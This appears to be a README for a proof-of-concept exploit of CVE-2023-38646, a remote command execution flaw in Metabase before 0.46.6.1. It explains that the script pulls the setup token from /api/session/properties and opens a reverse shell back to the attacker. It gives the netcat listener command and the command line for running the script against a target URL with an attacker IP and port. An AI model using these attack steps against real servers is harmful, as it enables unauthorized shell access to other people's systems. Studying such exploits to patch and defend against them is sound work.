Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server. I have written the script directly to gain reverse shell on the attacker's machine.
The script require the Target URL, Attackers IP and Port. Providing the setup token is not required for this exploit as the script tries to obtain it from /api/session/properties.
Make sure to start netcat listener on Attacker machine, using the following command :
nc -nlvp {Port}
Run the POC Script with:
- -u - Target URL (Metabase)
- -ip - Attacker IP
- -p - Port Number
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>